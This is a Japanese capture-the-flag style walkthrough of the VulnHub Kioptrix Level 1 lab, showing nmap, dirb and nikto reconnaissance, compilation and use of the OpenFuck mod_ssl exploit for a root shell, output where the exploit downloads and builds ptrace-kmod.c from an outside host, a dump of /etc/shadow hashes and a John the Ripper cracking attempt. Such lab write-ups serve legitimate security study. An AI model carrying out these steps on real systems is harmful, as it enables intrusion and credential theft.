【WeiteUp】Kioptrix Level1

はじめに

いつぞやのリベンジでございます

Kioptrixを独力で攻略してみました

 

 

使用ツール

netdiscover

nmap

nikto

dirb

searchsploit

 

 

偵察

% nmap -sV -sS -p 1-10000 -T5 192.168.3.29

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-28 02:52 EDT
Nmap scan report for 192.168.3.29
Host is up (0.0031s latency).
Not shown: 9994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:DB:CD:D6 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.73 seconds

 

 

動作しているサービス

22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)

 

% dirb http://192.168.3.29


-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Mar 28 03:26:48 2020
URL_BASE: http://192.168.3.29/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.3.29/ ----
+ http://192.168.3.29/~operator (CODE:403|SIZE:273)
+ http://192.168.3.29/~root (CODE:403|SIZE:269)
+ http://192.168.3.29/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.3.29/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.3.29/manual/
==> DIRECTORY: http://192.168.3.29/mrtg/
==> DIRECTORY: http://192.168.3.29/usage/

---- Entering directory: http://192.168.3.29/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.3.29/mrtg/ ----
+ http://192.168.3.29/mrtg/index.html (CODE:200|SIZE:17318)

---- Entering directory: http://192.168.3.29/usage/ ----
+ http://192.168.3.29/usage/index.html (CODE:200|SIZE:3704)

-----------------
END_TIME: Sat Mar 28 03:27:24 2020
DOWNLOADED: 13836 - FOUND: 6

 

有効なウェブディレクトリおよびページ
+ http://192.168.3.29/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.3.29/manual/
==> DIRECTORY: http://192.168.3.29/mrtg/
==> DIRECTORY: http://192.168.3.29/usage/
http://192.168.3.29/mrtg/index.html (CODE:200|SIZE:17318)
+ http://192.168.3.29/usage/index.html (CODE:200|SIZE:3704)

 

 % nikto -h 192.168.3.29

 

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.29
+ Target Hostname: 192.168.3.29
+ Target Port: 80
+ Start Time: 2020-03-28 02:56:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ 8724 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time: 2020-03-28 02:56:39 (GMT-4) (39 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

 

いくつかの脆弱性

+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.

および

+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

 

 →これらは可能性のため、改めての確認が必要

 

 

上記の情報から、以下の方針で侵入を試みる

1.nmapの結果に従い

111/tcp rpcbind 2 (RPC #100000)
139/tcp netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp status 1 (RPC #100024)

 の脆弱性を確認

 

2.diebの結果に従い

+ http://192.168.3.29/index.html (CODE:200|SIZE:2890)
http://192.168.3.29/mrtg/index.html (CODE:200|SIZE:17318)
+ http://192.168.3.29/usage/index.html (CODE:200|SIZE:3704)

 の脆弱性を確認

 

3.niktoの結果に従い

wp, PHPディレクト

mod_ssl

 の脆弱性を確認

侵入

1.nmapの結果より、以下に関する脆弱性をseachsploitで調査

111/tcp rpcbind 2 (RPC #100000)
139/tcp netbios-ssn Samba smbd (workgroup: MYGROUP)
1024/tcp status 1 (RPC #100024)

 →有用な結果を得られず


443/tcp ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

 →openfuck.cを確認

 

2.dirbの結果より、以下のURLに関する脆弱性を確認

+ http://192.168.3.29/index.html (CODE:200|SIZE:2890)

 →Apacheが動いていることを確認、侵入可能な脆弱性は確認できず

http://192.168.3.29/mrtg/index.html (CODE:200|SIZE:17318)

 →MRTGサービスが動いていることを確認、侵入可能な脆弱性は確認できず

+ http://192.168.3.29/usage/index.html (CODE:200|SIZE:3704)

 →Webalizerサービスが動いていることを確認、侵入可能な脆弱性は確認できず

 

3.niktoの結果より、wp, PHPバックドアを確認

 →すべてNG

 

mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

より、mod_sslに関する脆弱性を確認(1と同様)

 

openfuckを取得し、exploit実行する

 

OpenFuck実行

.cファイルの中身を確認し、コンパイル等に関する情報を入手

/*
* OF version r00t VERY PRIV8 spabam
* Version: v3.0.4
* Requirements: libssl-dev ( apt-get install libssl-dev )
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
* Note: if required, host ptrace and replace wget target
*/

 

記載通りに、以下コマンドを実行

% apt-get install libssl-dev

% gcc -o OpenFuck OpenFuck.c -lcrypto

 

引数にboxを指定するが、nmapより得られたApache 1.3.20およびRed-Hat Linuxから、

0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2

これらを引数の候補とする

 

% ./OpenFuck 0x6a 192.168.3.29 443

 →NG

 

% ./OpenFuck 0x6b 192.168.3.29 443

 →OK

 

kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1$ ./OpenFuck 0x6b 192.168.3.29 443

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--04:33:44-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

0K ... 100% @ 1.25 MB/s

04:33:45 (1.25 MB/s) - `ptrace-kmod.c' saved [3921/3921]

/usr/bin/ld: cannot open output file exploit: Permission denied
collect2: ld returned 1 exit status
gcc: file path prefix `/usr/bin' never used
whoami
root

 

rootをとれたので、権限昇格の必要はない

あれ、これで終わりだっけ??

 

 

探索

無事にマシン内に潜り込めたので、/etc/shadowファイルを確認

 

root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::
john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::
harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::

 

rootを含む3ユーザのshadowを取得し、ローカルにコピー

john the ripperを用いてPWの解析を行う

wordlistには、既にKaliに配備されているrockyou.txtを使用した

 

% john --wordlist=/usr/share/wordlist/rockyou.txt

 →ちょっと検索うまくいかない・・・

 

以上